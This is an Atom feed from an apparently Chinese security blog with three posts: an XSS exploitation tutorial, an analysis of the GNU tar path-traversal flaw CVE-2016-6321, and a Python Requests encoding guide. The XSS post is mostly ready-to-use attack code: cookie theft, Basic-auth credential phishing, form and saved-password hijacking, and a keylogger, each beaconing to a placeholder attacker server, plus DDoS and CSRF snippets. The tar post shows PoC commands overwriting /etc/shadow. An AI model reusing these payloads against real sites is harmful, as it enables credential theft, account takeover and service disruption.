<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>wps2015's blog</title>
<link href="/atom.xml" rel="self"/>
<link href="http://wps2015.org/"/>
<updated>2016-12-12T01:52:01.610Z</updated>
<id>http://wps2015.org/</id>
<author>
<name>wps2015</name>
</author>
<generator uri="http://hexo.io/">Hexo</generator>
<entry>
<title>Common XSS exploitation code and how it works</title>
<link href="http://wps2015.org/2016/12/12/usually-used-xss-code/"/>
<id>http://wps2015.org/2016/12/12/usually-used-xss-code/</id>
<published>2016-12-11T16:00:00.000Z</published>
<updated>2016-12-12T01:52:01.610Z</updated>
<content type="html"><![CDATA[<p>XSS is a security vulnerability that appears frequently in web applications: it lets a malicious web user plant code into pages that are served to other users. Common ways of exploiting it include cookie theft, HTTP Basic authentication phishing and form hijacking. Usually, once an XSS vulnerability has been found, the ready-made payloads of an XSS platform are used to carry out the attack. But to really understand how dangerous XSS is, you still need to write the attack code yourself and understand it.<a id="more"></a><br><strong>PS: the code in this article is for testing only; do not use it for illegal purposes!</strong></p>
<h3 id="Cookie偷取"><a href="#Cookie偷取" class="headerlink" title="Cookie theft"></a>Cookie theft</h3><p>The most common use of XSS is probably stealing cookies.</p>
<ol>
<li><p>Create an img tag with JavaScript and use the img's cross-origin request to pass the cookie to our server</p>
<figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line">var cookie = document.cookie;</span><br><span class="line">var ele = document.createElement("img"); //create an img element</span><br><span class="line">var time = new Date();</span><br><span class="line">ele.src = "http://yourserver.com/xss/xss_cookie/cookie1.php?cookie="+cookie+"&location="+window.location.href+"&time="+time; //send the cookie out</span><br><span class="line">ele.id = "imgs";</span><br></pre></td></tr></table></figure>
</li>
<li><p>Send a simple cross-origin request with Ajax</p>
<figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line">function ajax(){</span><br><span class="line">  var xmlHttp;</span><br><span class="line">  try {</span><br><span class="line">    xmlHttp = new XMLHttpRequest();</span><br><span class="line">  }catch(e){</span><br><span class="line">    try{</span><br><span class="line">      xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");</span><br><span class="line">    }catch(e){</span><br><span class="line">      try{</span><br><span class="line">        xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");</span><br><span class="line">      }catch(e){</span><br><span class="line">        return false</span><br><span class="line">      }</span><br><span class="line">    }</span><br><span class="line">  }</span><br><span class="line">  return xmlHttp;</span><br><span class="line">}</span><br><span class="line">xml = ajax(); //instantiate the ajax request object</span><br><span class="line">url = "http://yourserver.com/xss/xss_cookie/cookie1.php?cookie="+document.cookie+"&location="+window.location.href;</span><br><span class="line">xml.open("GET",url,true); //if there is a lot of data to send, use POST instead: xml.open("POST",url,true);xml.send("cookie="+cookie+"&location="+locations);</span><br><span class="line">xml.send();</span><br></pre></td></tr></table></figure>
</li>
</ol>
<h3 id="基础认证钓鱼"><a href="#基础认证钓鱼" class="headerlink" title="Basic authentication phishing"></a>Basic authentication phishing</h3><p>From what I could find, Basic authentication phishing was circulating widely around 2012 (I was only a kid back then...); typically you are browsing a site and a Basic authentication dialog suddenly pops up. In fact, any site that lets users embed external resources through tags can have this problem. Forums and similar sites usually let you reference an external image (which is really just an img tag); point its src at a resource that requires Basic authentication and the dialog appears. Try it with your router's admin address.<br><figure class="highlight html"><table><tr><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;img src="http://192.168.1.1"&gt; //as you know, the router's admin page requires Basic authentication, so you can try it here</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure></p>
<p>Once you understand how Basic authentication phishing works, it follows that XSS is another way to trigger it. First, build a Basic authentication page fish.php in PHP:<br><figure class="highlight php"><table><tr><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if($_SERVER['PHP_AUTH_PW'] =="" || $_SERVER['PHP_AUTH_USER'] =="" ) </span><br><span class="line">{ </span><br><span class="line">  header('WWW-Authenticate: Basic realm="info you want"'); //custom text shown in the dialog</span><br><span class="line">  header('HTTP/1.0 401 Unauthorized'); //401 Unauthorized</span><br><span class="line">} </span><br><span class="line">else{ </span><br><span class="line">  $user = $_SERVER['PHP_AUTH_USER']; </span><br><span class="line">  $pass = $_SERVER['PHP_AUTH_PW']; </span><br><span class="line">  $fish = "username:".$user." password:".$pass; </span><br><span class="line">  header("location:http://yourserver.com/fish_get.php?c=$fish"); //after the victim enters a username and password, redirect to the page that receives them</span><br><span class="line">} </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>Then use JavaScript to build an img that references that resource (any tag that can reference an external resource will do, such as script)<br><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line">var img = new Image();</span><br><span class="line">img.src="http://youserver.com/fish.php"</span><br></pre></td></tr></table></figure></p>
<h3 id="表单劫持"><a href="#表单劫持" class="headerlink" title="Form hijacking"></a>Form hijacking</h3><h5 id="劫持onsubmit方法"><a href="#劫持onsubmit方法" class="headerlink" title="Hijacking the onsubmit handler"></a>Hijacking the onsubmit handler</h5><p>When a form is submitted, its onsubmit handler is normally called. By the time onsubmit runs, every required field has already been filled in, so by replacing the onsubmit handler we can read the form's contents.<br><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line">var f=document.forms['myform']; //get the form object</span><br><span class="line">if(f==undefined)</span><br><span class="line">{</span><br><span class="line">  f=document.getElementById('formid');</span><br><span class="line">}</span><br><span class="line">var func=f.onsubmit;</span><br><span class="line">f.onsubmit=function(event)</span><br><span class="line">{</span><br><span class="line">  var str='';</span><br><span class="line">  for(var i=0;i&lt;f.elements.length;i++)</span><br><span class="line">  {</span><br><span class="line">    str+=f.elements[i].name+':'+f.elements[i].value+'||'; //read the value of each form element</span><br><span class="line">  }</span><br><span class="line">  str=str.substr(0,str.length-2);</span><br><span class="line">  var img=new Image();</span><br><span class="line">  img.src='http://myserver.com/img.php?data='+escape(str)+'&url='+escape(location.href); //send the captured plaintext password out</span><br><span class="line">  func(event);</span><br><span class="line">  return true;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<h5 id="修改action指向"><a href="#修改action指向" class="headerlink" title="Changing the action target"></a>Changing the action target</h5><p>Plaintext passwords can also be stolen by changing the form's action address with JavaScript<br><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line">var f=document.forms['myform'];</span><br><span class="line">if(f==undefined)</span><br><span class="line">{</span><br><span class="line">  f=document.getElementById('formid');</span><br><span class="line">}</span><br><span class="line">f.action = "http://myserver.com/accept.php"; //accept.php receives the POSTed fields</span><br></pre></td></tr></table></figure></p>
<p>But this approach is easily blocked by CSP (which can restrict the domain the form action may point to).</p>
<h5 id="获取浏览器记住的明文密码"><a href="#获取浏览器记住的明文密码" class="headerlink" title="Reading the plaintext password saved by the browser"></a>Reading the plaintext password saved by the browser</h5><p>When a user logs in, the browser usually offers to save the password. Once it is saved, the next time the login page is visited the browser automatically fills in the saved username and password. So if XSS is used to build a form on the target origin and the victim has saved a password in the browser, the autofill mechanism hands over the plaintext password.<br><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line">function create_form(user) { /*read the plaintext password*/</span><br><span class="line">  var f = document.createElement("form");</span><br><span class="line">  document.getElementsByTagName("body")[0].appendChild(f);</span><br><span class="line">  var e1 = document.createElement("input");</span><br><span class="line">  e1.type = "text";</span><br><span class="line">  e1.name = e1.id = "username";</span><br><span class="line">  e1.value = user;</span><br><span class="line">  f.appendChild(e1);</span><br><span class="line">  var e = document.createElement("input");</span><br><span class="line">  e.name = e.type = e.id = "password";</span><br><span class="line">  f.appendChild(e);</span><br><span class="line">  setTimeout(function () {</span><br><span class="line">    var img = new Image();</span><br><span class="line">    img.src = "http://yourserver.com/img.php?username=" + document.getElementById("username").value + "&password=" + document.getElementById("password").value;</span><br><span class="line">  }, 3000); // wait for autofill (timing race)</span><br><span class="line">}</span><br><span class="line">create_form('');</span><br></pre></td></tr></table></figure></p>
<p>Of course this method also depends on whether the browser supports it: the author tested it successfully on Firefox with default settings, while the latest Chrome does not prompt to save passwords by default. For a detailed description of the method see 余弦's article <a href="http://blog.knownsec.com/2012/02/xss_hack-steal_pwd_of_browsers/" target="_blank" rel="external">XSS Hack: stealing the plaintext passwords remembered by the browser</a></p>
<h5 id="键盘记录"><a href="#键盘记录" class="headerlink" title="Keylogging"></a>Keylogging</h5><p>Keyloggers usually turn up in system trojans, but JavaScript can also record keystrokes made in the browser<br><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line">var keys='';</span><br><span class="line">document.onkeypress = function(e) {</span><br><span class="line">  get = window.event?event:e;</span><br><span class="line">  key = get.keyCode?get.keyCode:get.charCode;</span><br><span class="line">  key = String.fromCharCode(key);</span><br><span class="line">  keys+=key;</span><br><span class="line">}</span><br><span class="line">window.setInterval(function(){</span><br><span class="line">  new Image().src = 'http://yourserver.com/g.php?c='+keys; //received on the server</span><br><span class="line">  keys = '';</span><br><span class="line">}, 1000); //send the keystroke log to the server every second and reset keys</span><br></pre></td></tr></table></figure></p>
<h3 id="DDos攻击"><a href="#DDos攻击" class="headerlink" title="DDoS attacks"></a>DDoS attacks</h3><p>JavaScript can easily send requests to other origins, and this is what lets XSS be used for DDoS. High-traffic sites such as YouTube and Sohu have been abused through stored XSS to launch large-scale DDoS. The attack code from the YouTube incident is used here as a reference:<br><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">&lt;img src="/imagename.png" onload="$.getScript("http://c&cdomain.com/index1.html")"&gt;//the vulnerable point is the avatar: once the avatar loads, the malicious js is loaded too</span><br><span class="line"></span><br><span class="line">function ddos(url){</span><br><span class="line">$("body").append("&lt;iframe id="ifr11323" style="display:none;" src="http://c&cdomain.com/index2.html"&gt;&lt;/iframe&gt;")//load a hidden iframe pointing at the attacker's chosen page</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">&lt;html&gt;&lt;/body&gt;&lt;h1&gt;iframe&lt;/h1&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">ddos("http://www.target1.com/1.jpg","http://www.target2.com/1.jpg"); //attack targets</span><br><span class="line">fucntion ddos(url1,url2){</span><br><span class="line">window.setInterval(){</span><br><span class="line">$.getScript(url1);</span><br><span class="line">$.getScript(url2);</span><br><span class="line">},1000 //send a get request every second</span><br><span class="line">};</span><br><span class="line">&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;</span><br></pre></td></tr></table></figure></p>
<p>For the details of the incident see <a href="http://thehackernews.com/2014/04/vulnerability-in-worlds-largest-site.html" target="_blank" rel="external">Vulnerability In Worlds’ Largest Site</a></p>
<h3 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h3><p>CSRF (cross-site request forgery) does not depend on an XSS vulnerability, but XSS is one way of carrying out a CSRF attack. For the GET case:<br><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line">var action = new Image();</span><br><span class="line">action.src = "http://www.target.com/index.php?action=delete&id=123" //delete some record</span><br></pre></td></tr></table></figure></p>
<p>For the POST case:<br><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line">function ajax(){</span><br><span class="line">  var xmlHttp;</span><br><span class="line">  try {</span><br><span class="line">    xmlHttp = new XMLHttpRequest();</span><br><span class="line">  }catch(e){</span><br><span class="line">    try{</span><br><span class="line">      xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");</span><br><span class="line">    }catch(e){</span><br><span class="line">      try{</span><br><span class="line">        xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");</span><br><span class="line">      }catch(e){</span><br><span class="line">        return false</span><br><span class="line">      }</span><br><span class="line">    }</span><br><span class="line">  }</span><br><span class="line">  return xmlHttp;</span><br><span class="line">}</span><br><span class="line">xml = ajax(); //instantiate the ajax request object</span><br><span class="line">url = "http://www.target.com/index.php";</span><br><span class="line">xml.open("POST",url,true)</span><br><span class="line">xml.send("action=delete&id=123"); //delete some record</span><br><span class="line">xml.send();</span><br></pre></td></tr></table></figure></p>
]]></content>
<summary type="html">
<p>XSS is a security vulnerability that appears frequently in web applications: it lets a malicious web user plant code into pages that are served to other users. Common ways of exploiting it include cookie theft, HTTP Basic authentication phishing and form hijacking. Usually, once an XSS vulnerability has been found, the ready-made payloads of an XSS platform are used to carry out the attack. But to really understand how dangerous XSS is, you still need to write the attack code yourself and understand it.
</summary>
<category term="Web安全" scheme="http://wps2015.org/categories/Web%E5%AE%89%E5%85%A8/"/>
<category term="xss" scheme="http://wps2015.org/tags/xss/"/>
</entry>
<entry>
<title>Analysis of the tar extraction path bypass vulnerability (CVE-2016-6321)</title>
<link href="http://wps2015.org/2016/11/08/the-test-of-Tar-extract-pathname-bypass/"/>
<id>http://wps2015.org/2016/11/08/the-test-of-Tar-extract-pathname-bypass/</id>
<published>2016-11-07T16:00:00.000Z</published>
<updated>2016-11-09T03:25:43.243Z</updated>
<content type="html"><![CDATA[<p>Security researcher Harry Sintonen and others discovered a directory traversal bypass in tar extraction on Linux; the original vulnerability analysis is <a href="https://sintonen.fi/advisories/tar-extract-pathname-bypass.txt" target="_blank" rel="external">here</a><a id="more"></a></p>
<h3 id="影响范围"><a href="#影响范围" class="headerlink" title="Affected scope"></a>Affected scope</h3><ul>
<li>GNU tar 1.14 to 1.29 (1.29 included)</li>
<li>Red Hat, Alpine Linux, Red Star OS, etc. (any Linux that uses GNU tar)</li>
</ul>
<h3 id="漏洞原因"><a href="#漏洞原因" class="headerlink" title="Cause of the vulnerability"></a>Cause of the vulnerability</h3><p>When the tar command extracts an archive and meets a path component named <code>..</code>, it strips <code>..</code> together with the directory structure before it, so as to make the file name safer, and makes the remaining file name relative to the extraction directory; but this itself leads to a security problem.</p>
<h3 id="漏洞测试"><a href="#漏洞测试" class="headerlink" title="Testing the vulnerability"></a>Testing the vulnerability</h3><p>Download the test <a href="https://sintonen.fi/advisories/tar-poc.tar" target="_blank" rel="external">exp</a> and run the tar command as root</p>
<h4 id="在根目录下解压,不指定解压文件"><a href="#在根目录下解压,不指定解压文件" class="headerlink" title="Extract in the root directory without specifying a file to extract"></a>Extract in the root directory without specifying a file to extract</h4><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">root@kali:/# tar xvf tar-poc.tar</span><br></pre></td></tr></table></figure>
<p>You can see that once <code>etc/mod/../</code> is stripped, the path relative to the current directory (the root directory) is <code>etc/shadow</code>, so the absolute path after extraction is <code>/etc/shadow</code>, and shadow gets overwritten.<br><img src="https://img.alicdn.com/imgextra/i1/792076116/TB230wYbZeJ.eBjy0FiXXXqapXa_!!792076116.png" alt=""></p>
<h4 id="在任一目录下解压,不指定解压文件"><a href="#在任一目录下解压,不指定解压文件" class="headerlink" title="Extract in any directory without specifying a file to extract"></a>Extract in any directory without specifying a file to extract</h4><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">root@kali:/home/wps2015# tar xvf tar-poc.tar</span><br></pre></td></tr></table></figure>
<p>You can see that the file was extracted to <code>etc/shadow</code> under the current directory<br><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2j3Q5czm2.eBjSZFtXXX56VXa_!!792076116.png" alt=""></p>
<h4 id="在任意目录下解压,指定解压目录”-C-“"><a href="#在任意目录下解压,指定解压目录”-C-“" class="headerlink" title="Extract in any directory, specifying the extraction directory with ”-C /“"></a>Extract in any directory, specifying the extraction directory with ”-C /“</h4><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">root@kali:/home/wps2015# tar xvf tar-poc.tar -C /</span><br></pre></td></tr></table></figure>
<p>You can see that <code>/etc/shadow</code> was overwritten successfully<br><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2IiE6cp5N.eBjSZFKXXX_QVXa_!!792076116.png" alt=""></p>
<h4 id="在任意目录下解压,指定解压文件"><a href="#在任意目录下解压,指定解压文件" class="headerlink" title="Extract in any directory, specifying the file to extract"></a>Extract in any directory, specifying the file to extract</h4><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">root@kali:/home/wps2015# tar xvf tar-poc.tar etc/motd/</span><br></pre></td></tr></table></figure>
<p>Extraction also succeeds when the file to extract is specified<br><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2hwZYbY1K.eBjSsphXXcJOXXa_!!792076116.png" alt=""></p>
<h3 id="总结"><a href="#总结" class="headerlink" title="Summary"></a>Summary</h3><p>This vulnerability requires several conditions to be met, such as elevated privileges (root) and extracting the files in a specific directory.</p>
]]></content>
<summary type="html">
<p>Security researcher Harry Sintonen and others discovered a directory traversal bypass in tar extraction on Linux; the original vulnerability analysis is <a href="https://sintonen.fi/advisories/tar-extract-pathname-bypass.txt">here</a>
</summary>
<category term="漏洞分析" scheme="http://wps2015.org/categories/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"/>
<category term="linux" scheme="http://wps2015.org/tags/linux/"/>
</entry>
<entry>
<title>Fixing garbled Chinese when fetching pages with Requests</title>
<link href="http://wps2015.org/2016/10/28/how-to-requests-chinese-in-python/"/>
<id>http://wps2015.org/2016/10/28/how-to-requests-chinese-in-python/</id>
<published>2016-10-27T16:00:00.000Z</published>
<updated>2016-11-08T01:47:54.552Z</updated>
<content type="html"><![CDATA[<p>Requests is written in Python and built on urllib3, so it has all of urllib3's features: it supports HTTP keep-alive and connection pooling, session persistence with cookies, file uploads, automatic detection of the response body's encoding, and automatic encoding of internationalized URLs and POST data. Modern, international and user-friendly. Because it is so capable it is now widely used for crawlers and the like, but when fetching Chinese pages you will sooner or later run into encoding problems; this article discusses those problems.<a id="more"></a></p>
<h4 id="简单demo"><a href="#简单demo" class="headerlink" title="Simple demo"></a>Simple demo</h4><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">import requests</span><br><span class="line">r = requests.get("http://www.scusec.org")</span><br><span class="line">print r.encoding # the encoding Requests guessed</span><br><span class="line">print r.text # the response body as a string, automatically decoded using the character encoding from the response headers</span><br><span class="line">print r.content # the response body as bytes, with gzip and deflate decoded for you automatically</span><br></pre></td></tr></table></figure>
<p>After the request is sent, Requests makes an educated guess about the response's encoding based on the HTTP headers. When you read r.text, Requests decodes the body with that guessed encoding; r.content gives you the raw bytes of the body instead.</p>
<h4 id="Requests默认识别编码"><a href="#Requests默认识别编码" class="headerlink" title="Requests默认识别编码"></a>Requests默认识别编码</h4><p>在 <code>C:\Python27\Lib\site-packages\requests\utils.py</code>中,发现默认encoding的获取方式<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Try charset from content-type</span></span><br><span class="line">encoding = get_encoding_from_headers(r.headers)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_encoding_from_headers</span><span class="params">(headers)</span>:</span></span><br><span class="line"> <span class="string">"""Returns encodings from given HTTP Header Dict.</span><br><span class="line"></span><br><span class="line"> :param headers: dictionary to extract encoding from.</span><br><span class="line"> """</span></span><br><span class="line"></span><br><span class="line"> content_type = headers.get(<span class="string">'content-type'</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> content_type:</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">None</span></span><br><span 
class="line"></span><br><span class="line"> content_type, params = cgi.parse_header(content_type)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="string">'charset'</span> <span class="keyword">in</span> params:</span><br><span class="line"> <span class="keyword">return</span> params[<span class="string">'charset'</span>].strip(<span class="string">"'\""</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="string">'text'</span> <span class="keyword">in</span> content_type:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'ISO-8859-1'</span></span><br></pre></td></tr></table></figure></p>
<p>In get_encoding_from_headers, if the response's <code>content-type</code> header carries a "charset", that encoding is returned; otherwise, for a text type, it falls back to "ISO-8859-1". Deciding the encoding this way is rather simplistic and hasty.</p>
<h4 id="Requests其他识别编码方式"><a href="#Requests其他识别编码方式" class="headerlink" title="Requests其他识别编码方式"></a>Requests其他识别编码方式</h4><p>在知道Requests的默认识别方式不靠谱后,通常我们采用的方式有</p>
<blockquote>
<ol>
<li>提取返回体中 <code>META http-equiv=Content-Type content="text/html; charset=gb2312</code>中的编码格式</li>
<li>利用chardet库识别返回体的编码格式</li>
</ol>
</blockquote>
<p>In fact Requests already supports both of these detection methods. See <code>utils.py</code>:<br><figure class="highlight python"><pre><code>import re
import warnings

def get_encodings_from_content(content):
    """Returns encodings from given content string.

    :param content: bytestring to extract encodings from.
    """
    warnings.warn((
        'In requests 3.0, get_encodings_from_content will be removed. For '
        'more information, please see the discussion on issue #2266. (This'
        ' warning should only appear once.)'),
        DeprecationWarning)

    charset_re = re.compile(r'&lt;meta.*?charset=["\']*(.+?)["\'&gt;]', flags=re.I)
    pragma_re = re.compile(r'&lt;meta.*?content=["\']*;?charset=(.+?)["\'&gt;]', flags=re.I)
    xml_re = re.compile(r'^&lt;\?xml.*?encoding=["\']*(.+?)["\'&gt;]')

    return (charset_re.findall(content) +
            pragma_re.findall(content) +
            xml_re.findall(content))
</code></pre></figure></p>
<p>And in <code>models.py</code>, the apparent_encoding property is defined<br><figure class="highlight python"><pre><code># inside class Response
@property
def apparent_encoding(self):
    """The apparent encoding, provided by the chardet library"""
    return chardet.detect(self.content)['encoding']
</code></pre></figure></p>
<h4 id="三种识别方式比较"><a href="#三种识别方式比较" class="headerlink" title="三种识别方式比较"></a>三种识别方式比较</h4><p>针对这三种方式,有的需要获取返回体,所以这三种识别编码的速率及需要的资源不同。先看看下面的程序:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#! usr/bin/env python</span></span><br><span class="line"><span class="comment">#! 
coding: utf-8</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line">r = requests.get(<span class="string">"http://www.scusec.org"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">charset_type</span><span class="params">()</span>:</span></span><br><span class="line"> char_type = requests.utils.get_encoding_from_headers(r.headers)</span><br><span class="line"> <span class="keyword">return</span> char_type</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">charset_content</span><span class="params">()</span>:</span></span><br><span class="line"> charset_content = requests.utils.get_encodings_from_content(r.content)</span><br><span class="line"> <span class="keyword">return</span> charset_content[<span class="number">0</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">charset_det</span><span class="params">()</span>:</span></span><br><span class="line"> charset_det = r.apparent_encoding</span><br><span class="line"> <span class="keyword">return</span> charset_det</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">chose_fun</span><span class="params">(n)</span>:</span></span><br><span class="line"> <span class="keyword">if</span> n == <span class="number">1</span>:</span><br><span class="line"> <span class="keyword">return</span> charset_type</span><br><span class="line"> <span class="keyword">elif</span> n == <span class="number">2</span>:</span><br><span class="line"> <span 
class="keyword">return</span> charset_content</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> charset_det</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">4</span>):</span><br><span class="line"> funs = chose_fun(i)</span><br><span class="line"> start_time = time.time()</span><br><span class="line"> chars = funs()</span><br><span class="line"> end_time = time.time()</span><br><span class="line"> times = end_time - start_time</span><br><span class="line"> <span class="keyword">print</span> chars+<span class="string">" "</span>+str(times)</span><br></pre></td></tr></table></figure></p>
<p>Results<br><img src="https://img.alicdn.com/imgextra/i2/792076116/TB23LWhbo5O.eBjSZFxXXaaJFXa_!!792076116.png" alt=""><br>In speed, <code>charset_type &gt; charset_content &gt; charset_det</code>, and <code>charset_type</code> is also the cheapest in memory.</p>
<h4 id="综合的解决方法"><a href="#综合的解决方法" class="headerlink" title="综合的解决方法"></a>综合的解决方法</h4><p>综合上面的几种解决方式,可以定义一个解决函数:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">charsets</span><span class="params">(res)</span>:</span></span><br><span class="line"> _charset = requests.utils.get_encoding_from_headers(res.headers)</span><br><span class="line"> <span class="keyword">if</span> _charset == <span class="string">'ISO-8859-1'</span>:</span><br><span class="line"> __charset = requests.utils.get_encodings_from_content(res.content)[<span class="number">0</span>]</span><br><span class="line"> <span class="keyword">if</span> __charset:</span><br><span class="line"> _charset = __charset</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> _charset = res.apparent_encoding</span><br><span class="line"> <span class="keyword">return</span> _charset</span><br></pre></td></tr></table></figure></p>
<p>Then, to handle a Chinese page:</p>
<ol>
<li>Use <code>charsets</code> to get the page's encoding and decode or re-encode <code>r.content</code> accordingly</li>
<li>Use <code>charsets</code> to get the page's encoding, set <code>r.encoding</code> to it, then read <code>r.text</code></li>
</ol>
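<p>The <code>charsets</code> helper relies on two Requests internals, one of which Requests itself marks as deprecated. As an added example (not code from the original post), the same header, then meta tag, then byte-sniffing fallback chain is written below with the standard library only, so it runs offline; the <code>SAMPLES</code> responses are constructed, and <code>sniff_encoding</code> is a deliberately simple stand-in for chardet that only distinguishes valid UTF-8 from a GB-family legacy encoding.</p>

```python
"""Header -> <meta>/<?xml ...?> declaration -> byte sniffing, without requests or chardet."""
import re
from email.message import Message

# Same placeholder Requests returns for any text/* response that names no charset.
_PLACEHOLDER = "ISO-8859-1"

# <meta charset="..."> and <meta http-equiv="Content-Type" content="...; charset=...">.
_META_CHARSET_RE = re.compile(rb'<meta[^>]*?charset=["\']?\s*([\w.:-]+)', re.I)
# <?xml version="1.0" encoding="..."?> at the very start of the document.
_XML_ENCODING_RE = re.compile(rb'^\s*<\?xml[^>]*?encoding=["\']([\w.:-]+)["\']', re.I)


def encoding_from_headers(headers):
    """Mirror of requests' get_encoding_from_headers, using email.message for the parsing."""
    content_type = next((v for k, v in headers.items() if k.lower() == "content-type"), None)
    if not content_type:
        return None
    msg = Message()  # parses 'type/subtype; charset=...' parameters for us
    msg["content-type"] = content_type
    charset = msg.get_param("charset")
    if isinstance(charset, tuple):  # RFC 2231 encoded parameter: (charset, language, value)
        charset = charset[2]
    if charset:
        return str(charset).strip("'\"")
    if "text" in msg.get_content_type():
        return _PLACEHOLDER
    return None


def encodings_from_content(body):
    """Every charset the document declares about itself, meta tags first, then the XML prolog."""
    found = _META_CHARSET_RE.findall(body) + _XML_ENCODING_RE.findall(body)
    return [f.decode("ascii", "ignore") for f in found]


def sniff_encoding(body):
    """Simplified stand-in for chardet: valid UTF-8 wins, otherwise assume GB18030,
    a superset of GB2312/GBK and the usual case for legacy Chinese pages."""
    try:
        body.decode("utf-8")
        return "utf-8"
    except UnicodeDecodeError:
        return "gb18030"


def detect_encoding(headers, body):
    """Header charset first; if it is missing or only the ISO-8859-1 placeholder,
    trust the document's own declaration; sniff the bytes as a last resort."""
    charset = encoding_from_headers(headers)
    if charset and charset != _PLACEHOLDER:
        return charset
    declared = encodings_from_content(body)
    if declared:
        return declared[0]
    return sniff_encoding(body)


def decode_body(headers, body):
    """Decode with the detected charset, replacing rather than raising on stray bytes."""
    return body.decode(detect_encoding(headers, body), errors="replace")


# Constructed sample responses (not captured from any real site).
TEXT = "四川大学网络安全"
SAMPLES = {
    # charset present in the header: nothing else is consulted
    "header": ({"content-type": "text/html; charset=utf-8"}, TEXT.encode("utf-8")),
    # header says only text/html, the page declares gb2312 itself
    "meta": ({"content-type": "text/html"},
             b'<html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head>'
             + TEXT.encode("gb2312")),
    # no declaration anywhere: the bytes have to be sniffed
    "sniff": ({"content-type": "text/html"}, TEXT.encode("gbk")),
}

if __name__ == "__main__":
    for name, (hdrs, raw) in SAMPLES.items():
        print(name, detect_encoding(hdrs, raw), decode_body(hdrs, raw))
```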
]]></content>
<summary type="html">
